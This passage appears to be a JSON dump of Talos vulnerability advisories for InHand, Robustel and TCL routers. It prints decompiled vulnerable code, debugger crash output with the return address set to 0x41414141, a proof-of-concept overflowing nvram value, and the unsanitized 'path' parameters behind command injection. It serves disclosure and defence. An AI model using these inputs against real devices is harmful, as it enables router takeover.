\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n $zero: 0x0\n $at : 0x7ff38bf6 \u2192 0x4c707ff3\n $v0 : 0x0\n $v1 : 0x23\n $a0 : 0x1\n $a1 : 0x0\n $a2 : 0x1\n $a3 : 0x0\n $t0 : 0x0\n $t1 : 0x87fa118c\n $t2 : 0x8000\n $t3 : 0x0\n $t4 : 0x547\n $t5 : 0x87fa11d8\n $t6 : 0x8692dd1e\n $t7 : 0x10000\n $s0 : 0x41414141 (\"AAAA\"?)\n $s1 : 0x41414141 (\"AAAA\"?)\n $s2 : 0x41414141 (\"AAAA\"?)\n $s3 : 0x41414141 (\"AAAA\"?)\n $s4 : 0x41414141 (\"AAAA\"?)\n $s5 : 0x41414141 (\"AAAA\"?)\n $s6 : 0x00460000 \u2192 0xafb30024 (\"$\"?)\n $s7 : 0x2\n $t8 : 0x10\n $t9 : 0x00462af0 \u2192 0x8f998010\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x0047e938 \u2192 \"user_define_00\"\n $pc : 0x0040fa14 \u2192 <user_define_set_item+248> jr ra\n $sp : 0x7ff39938 \u2192 0x00000000\n $hi : 0x1\n $lo : 0x0\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x484d90\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x7ff39938\u2502+0x0000: 0x00000000 \u2190 $sp\n 0x7ff3993c\u2502+0x0004: 0x00000000\n 0x7ff39940\u2502+0x0008: 0x00000000\n 0x7ff39944\u2502+0x000c: 0x00000000\n 0x7ff39948\u2502+0x0010: 0x00484d90\n 0x7ff3994c\u2502+0x0014: 0x00000000\n 0x7ff39950\u2502+0x0018: 0x00000042 (\"B\"?)\n 0x7ff39954\u2502+0x001c: 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x40fa08 <user_define_set_item+236> lw s2, 6836(sp)\n 0x40fa0c <user_define_set_item+240> lw s1, 6832(sp)\n 0x40fa10 <user_define_set_item+244> lw s0, 6828(sp)\n \u2192 0x40fa14 <user_define_set_item+248> jr ra\n [!] Cannot disassemble from $PC\n \n\n#### Exploit Proof of Concept\n\nIf in the nvram configuration is defined as `user_define_timeout=B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:41` and then the code at `[8]` is reached, the `httpd` binary would exhibit the crash shown above. The return address register, `ra`, of the `user_define_set_item` function has value 0x41414141.\n\n### Vendor Response\n\nThe vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4\n\nhttps://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf\n\n### Timeline\n\n2022-03-21 - Vendor Disclosure \n2022-05-10 - Public Release \n2022-05-10 - Vendor Patch Release \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "talos", "title": "InHand Networks InRouter302 libnvram.so nvram_import improper input validation vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26780", "CVE-2022-26781", "CVE-2022-26782"], "modified": "2022-05-10T00:00:00", "id": "TALOS-2022-1481", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1481", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:56:22", "description": "### Summary\n\nMultiple command injection vulnerabilities exist in the web_server action endpoints functionalities of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.\n\n### Tested Versions\n\nRobustel R1510 3.3.0\n\n### Product URLs\n\nR1510 - <https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/>\n\n### CVSSv3 Score\n\n9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n### Details\n\nThe R1510 is an industrial cellular router. It offers several advanced software like an innovative use of Open VPN, Cloud management, data over-use guard, smart reboot and others.\n\nThe R1510 has a web server that manages several endpoints. One group of endpoints have the following form `/action/<API_endpoint>/`. Several of those endpoints use unsafe functions with user provided parameters, like the standard `system` function, and a custom one called `sysprintf`.\n\nHere it is `sysprintf`:\n \n \n void sysprintf(char *format_string,char *param_2,char *char*,char *param_4)\n \n {\n [...]\n \n va_list_ptr = va_list;\n va_list[0] = param_2;\n va_list[1] = char*;\n va_list[2] = param_4;\n vsnprintf(shell_command,0x200,format_string,va_list_ptr); [1]\n system(shell_command); [2]\n return;\n }\n \n\nAt `[1]` a string is formatted, using the first argument of the function as format string and the others parameters as format string arguments. If one of the argument is controllable by an attacker a command injection would occur at `[2]`.\n\n#### CVE-2022-33312 - /action/import_cert_file/ command injection\n\nThis command injection is in the `/action/import_cert_file/` API.\n\nThe function that handles that endpoint is:\n \n \n void /action/import_cert_file/(Webs *webs)\n \n {\n [...]\n \n [...]\n path = (char *)websGetVar(webs,\"path\",0); [3]\n if ((path != (char *)0x0) &&\n (target_file = websGetVar(webs,\"target_file\",0), target_file != 0)) {\n hash = scaselessmatch(webs->method,\"POST\");\n iVar7 = 0;\n if (hash != 0) {\n pWVar1 = hashFirst((char)webs->files);\n while (pWVar1 != (WebsKey *)0x0) {\n ppcVar9 = *(char ***)&(pWVar1->content).value;\n hash = dir_exists(path); [4]\n if (hash == 0) {\n sysprintf(\"mkdir -p %s\",path); [5]\n }\n [...]\n } At `[3]` the variable `path` is fetched, then at `[4]` it is checked if its value correspond to an existing directory. If the directory does not exist the value will be used, at `[5]`, as argument of the `sysprintf` function. This can lead to a command injection.\n \n\n#### CVE-2022-33313 - /action/import_https_cert_file/ command injection\n\nThis command injection is in the `/action/import_https_cert_file/` API.\n\nThe function that handles that endpoint is:\n \n \n void /action/import_https_cert_file/(Webs *webs)\n \n {\n [...]\n \n [...]\n type_var = websGetVar(webs,\"type\",0);\n path_var = websGetVar(webs,\"path\",0); [6]\n if ((type_var != 0) && (path_var != 0)) {\n iVar1 = scaselessmatch(webs->method,\"POST\");\n if (iVar1 != 0) {\n pWVar2 = hashFirst((char)webs->files);\n while (pWVar2 != (WebsKey *)0x0) {\n uploaded_location = *(undefined4 **)&(pWVar2->content).value;\n iVar1 = string_matched(type_var,\"ca\");\n if (iVar1 == 0) {\n iVar1 = string_matched(type_var,\"private_key\");\n if (iVar1 != 0) {\n path_formatted_value = \"%s/server.key\";\n goto LAB_00481458;\n }\n }\n else {\n path_formatted_value = \"%s/server.crt\";\n LAB_00481458:\n path_formatted_value = (char *)sfmt(path_formatted_value,path_var); [7]\n }\n if (path_formatted_value != (char *)0x0) {\n sysprintf(\"mv %s %s -f\",*uploaded_location,path_formatted_value); [8]\n [...]\n }\n \n\nAt `[6]` the variable `path` is fetched, then at `[7]` it is used as argument to format a string based on another provided variable. The formatted string is then used at `[8]` as argument for the `sysprintf` function. This can lead to a command injection.\n\n#### CVE-2022-33314 - /action/import_sdk_file/ command injection\n\nThis command injection is in the `/action/import_sdk_file/` API.\n\nThe function that handles that endpoint is:\n \n \n void /action/import_sdk_file/(Webs *webs)\n \n {\n [...]\n \n [...]\n path_param = websGetVar(webs,\"path\",0); [9]\n if (path_param != 0) {\n websSetStatus(webs,200);\n websWriteHeaders(webs,0xffffffff,0);\n websWriteHeader(webs,\"Content-Type\",\"text/html\");\n websWriteEndHeaders(webs);\n iVar1 = scaselessmatch(webs->method,\"POST\");\n if (iVar1 != 0) {\n pWVar4 = hashFirst((char)webs->files);\n while (pWVar4 != (WebsKey *)0x0) {\n ppcVar8 = *(char ***)&(pWVar4->content).value;\n iVar1 = dir_exists(path_param); [10]\n if (iVar1 == 0) {\n sysprintf(\"mkdir -p %s\",path_param); [11]\n }\n [...]\n } \n \n\nAt `[9]` the variable `path` is fetched, then at `[10]` it is checked if its value correspond to an existing directory. If the directory does not exist the value will be used, at `[11]` as argument of the `sysprintf` function. This can lead to a command injection.\n\n### Timeline\n\n2022-06-27 - Initial vendor contact \n2022-06-28 - Vendor Disclosure \n2022-06-30 - Public Release \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-30T00:00:00", "type": "talos", "title": "Robustel R1510 web_server action endpoints OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-33312", "CVE-2022-33313", "CVE-2022-33314"], "modified": "2022-06-30T00:00:00", "id": "TALOS-2022-1572", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1572", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:56:20", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1455\n\n## TCL LinkHub Mesh Wifi confsrv set_mf_rule stack-based buffer overflow vulnerability\n\n##### August 1, 2022\n\n##### CVE Number\n\nCVE-2022-23919,CVE-2022-23918\n\n##### SUMMARY\n\nA stack-based buffer overflow vulnerability exists in the confsrv set_mf_rule functionality of TCL LinkHub Mesh Wifi MS1G_00_01.00_14. A specially-crafted network packet can lead to stack-based buffer overflow. An attacker can send a malicious packet to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nTCL LinkHub Mesh Wifi MS1G_00_01.00_14\n\n##### PRODUCT URLS\n\nLinkHub Mesh Wifi - <https://www.tcl.com/us/en/products/connected-home/linkhub/linkhub-mesh-wifi-system-3-pack>\n\n##### CVSSv3 SCORE\n\n8.8 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-121 - Stack-based Buffer Overflow\n\n##### DETAILS\n\nThe LinkHub Mesh WiFi system is a node-based mesh system designed for wifi deployments across large homes. These nodes include most features standard in current WiFi solutions and allow for easy expansion of the system by adding nodes. The mesh is managed solely by a phone application and the routers have no web-based management console.\n\nThe LinkHub Mesh system uses protobuffers to communicate both internally on the device as well as externally with the controlling phone application. These protobuffers can be sent to port 9003 while on the WiFi provided by the LinkHub Mesh in order to issue commands much like the phone application would. Once the protobuffer is received, it is routed internally starting from the `ucloud` binary and is dispatched to the appropriate handler.\n\nIn this case, the handler is `confsrv` which handles many message types, in this case we are interested in `mf_lists`\n \n \n message mf_rule {\n required string ethaddr = 1; [1]\n optional string name = 2; [2]\n }\n message mf_lists {\n required int32 mode = 1;\n repeated MESSAGE_NOT_RESOLVED rules = 2; //This is not optional, so it must be resolved by hand to compile to .proto\n optional uint64 timestamp = 3;\n } \n \n\nUsing [1] and [2] we have control over both `ethaddr` and `name` in the packet, the parsing of the data within the protobuffer is `conf_set_mf_cfg`\n \n \n 004141f0 int32_t conf_set_mf_cfg(int32_t arg1, int32_t arg2, int32_t arg3)\n \n 00414210 arg_0 = arg1\n 0041421c int32_t $a3\n 0041421c arg_c = $a3\n 0041423c void var_108\n 0041423c memset(&var_108, 0, 0x80)\n 00414264 void var_88\n 00414264 memset(&var_88, 0, 0x80)\n 00414288 struct MfLists* pkt = mf_lists__unpack(0, arg3, arg2) [3]\n 0041429c int32_t $v0_2\n 0041429c if (pkt == 0) {\n 004142c8 printf(\"[%s][%d][niuwu] Unpack failed %d\u2026\", \"conf_set_mf_cfg\", 0x103, arg3, 0x4ae4b0)\n 004142d4 $v0_2 = 0xffffffff\n 004142d4 } else {\n 004142e8 clear_all_mf_mib()\n 00414300 set_mf_rule(pkt: pkt) [4]\n 00414314 if (pkt->is_timestamp_present != 0) {\n 00414344 sprintf(&var_88, \"%llu\", pkt->timestamp.d, pkt->timestamp:4.d, 0x4ae4b0)\n 00414368 SetValue(name: \"sys.cfg.stamp\", input_buffer: &var_88)\n 0041435c }\n ...\n \n\nAt [3] the protobuffer is unpacked into a structure and then at [4] the structure is passed into `set_mf_rule`\n \n \n 00413b2c int32_t set_mf_rule(struct MfLists* pkt)\n \n 00413b54 uint8_t ethAddrBuffer[0x12]\n 00413b54 ethAddrBuffer[0].d = 0\n 00413b58 ethAddrBuffer[4].d = 0\n 00413b5c ethAddrBuffer[8].d = 0\n 00413b60 ethAddrBuffer[0xc].d = 0\n 00413b64 ethAddrBuffer[0x10].w = 0\n 00413b84 uint8_t nameBuffer[0x40]\n 00413b84 memset(&nameBuffer, 0, 0x40)\n 00413bac uint8_t var_150[0x40]\n 00413bac memset(&var_150, 0, 0x40)\n 00413bd4 uint8_t var_110[0x80]\n 00413bd4 memset(&var_110, 0, 0x80)\n 00413bfc uint8_t var_90[0x80]\n 00413bfc memset(&var_90, 0, 0x80)\n 00413c08 int32_t var_1a8 = 0\n 00413c0c int32_t var_1ac = 0\n 00413c18 int32_t var_1b8 = 0\n 00413c1c int32_t var_1ac_1 = 0\n 00414080 int32_t $v0_31\n 00414080 while (true) {\n 00414080 $v0_31 = var_1ac_1 s< 2 ? 1 : 0\n 00414084 if ($v0_31 == 0) {\n 00414084 break\n 00414084 }\n 00413c2c int32_t var_1b0_1\n 00413c2c if (var_1ac_1 != 0) {\n 00413c48 var_1b0_1 = 5\n 00413c48 } else {\n 00413c38 var_1b0_1 = 2\n 00413c38 }\n 00413f54 uint8_t (* var_1c8)[0x40]\n 00413f54 for (int32_t loop_idx = 0; loop_idx u< pkt->rules_count; loop_idx = loop_idx + 1) {\n 00413c6c struct MfRule* $v0_6 = *(pkt->rules + (loop_idx << 2))\n 00413c8c memset(&ethAddrBuffer, 0, 0x12) [5]\n 00413cb0 memset(&nameBuffer, 0, 0x40) [6]\n 00413cc0 if ($v0_6 != 0) {\n 00413cd0 if ($v0_6->ethAddr != 0) {\n ?00413d18 memcpy(&ethAddrBuffer, $v0_6->ethAddr, strlen($v0_6->ethAddr)) [7]\n 00413ce4 }\n 00413d2c if ($v0_6->name != 0) {\n ?00413d74 memcpy(&nameBuffer, $v0_6->name, strlen($v0_6->name)) [8]\n 00413d40 } \n ....\n \n\n#### CVE-2022-23918 - ethAddr stack buffer overflow\n\nAs seen above at [5] the `ethAddr` `memcpy` occurs into a stack-based buffer of size 0x12.\n \n \n 00413cd8 2000c28f lw $v0, 0x20($fp) {var_1b8_1}\n 00413cdc 0c00508c lw $s0, 0xc($v0) {MfRule::ethAddr}\n 00413ce0 2000c28f lw $v0, 0x20($fp) {var_1b8_1}\n 00413ce4 0c00428c lw $v0, 0xc($v0) {MfRule::ethAddr}\n 00413ce8 21204000 move $a0, $v0\n 00413cec c08a828f lw $v0, -0x7540($gp) {strlen} [9]\n 00413cf0 21c84000 move $t9, $v0\n 00413cf4 09f82003 jalr $t9\n 00413cf8 00000000 nop \n 00413cfc 1800dc8f lw $gp, 0x18($fp) {var_1c0}\n 00413d00 3400c327 addiu $v1, $fp, 0x34 {ethAddrBuffer}\n 00413d04 21206000 move $a0, $v1 {ethAddrBuffer}\n 00413d08 21280002 move $a1, $s0\n 00413d0c 21304000 move $a2, $v0\n 00413d10 b88b828f lw $v0, -0x7448($gp) {memcpy}\n 00413d14 21c84000 move $t9, $v0\n 00413d18 09f82003 jalr $t9\n 00413d1c 00000000 nop \n \n\nAt [7] and [9] we can see that the length of the `memcpy` is not the static size of the buffer, but instead the `strlen` of the user data provided from the protobuf packet. This results in a simple stack buffer overflow.\n\n#### Crash Information\n \n \n Program received signal SIGSEGV, Segmentation fault.\n 0x41414141 in ?? ()\n [ Legend: Modified register | Code | Heap | Stack | String ]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n $zero: 0x0\n $at : 0x806f0000\n $v0 : 0x0\n $v1 : 0x2\n $a0 : 0x11\n $a1 : 0x2\n $a2 : 0x200\n $a3 : 0x0\n $t0 : 0x1\n $t1 : 0x41414141 (\"AAAA\"?)\n $t2 : 0x41414141 (\"AAAA\"?)\n $t3 : 0x41414141 (\"AAAA\"?)\n $t4 : 0x41414141 (\"AAAA\"?)\n $t5 : 0x41414141 (\"AAAA\"?)\n $t6 : 0x41414141 (\"AAAA\"?)\n $t7 : 0x41414141 (\"AAAA\"?)\n $s0 : 0x41414141 (\"AAAA\"?)\n $s1 : 0x7fe05d48 \u2192 0x82011507\n $s2 : 0x772f6a60 \u2192 \"uc_api_lib.c\"\n $s3 : 0x0\n $s4 : 0x772f7be4 \u2192 \"_session_read_and_dispatch\"\n $s5 : 0x772dd090 \u2192 0x3c1c0003\n $s6 : 0x1b6\n $s7 : 0x10\n $t8 : 0x1\n $t9 : 0x76ee752c \u2192 0x3c1c0002\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x41414141 (\"AAAA\"?)\n $pc : 0x41414141 (\"AAAA\"?)\n $sp : 0x7fe05af8 \u2192 0x004bbfe8 \u2192 0x772d1c28 \u2192 0x28aaeef9\n $hi : 0x5\n $lo : 0x19999999\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x004ae4b0 \u2192 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7fe05af8\u2502+0x0000: 0x004bbfe8 \u2192 0x772d1c28 \u2192 0x28aaeef9 \u2190 $sp\n 0x7fe05afc\u2502+0x0004: 0x000001ae\n 0x7fe05b00\u2502+0x0008: 0x7fe05d6c \u2192 0xa9120108\n 0x7fe05b04\u2502+0x000c: 0x00000000\n 0x7fe05b08\u2502+0x0010: 0x004ae4b0 \u2192 0x00000000\n 0x7fe05b0c\u2502+0x0014: 0x00000000\n 0x7fe05b10\u2502+0x0018: 0x004bbfe8 \u2192 0x772d1c28 \u2192 0x28aaeef9\n 0x7fe05b14\u2502+0x001c: 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\n [!] Cannot disassemble from $PC\n [!] Cannot access memory at address 0x41414140\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, stopped 0x41414141 in ?? (), reason: SIGSEGV\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u250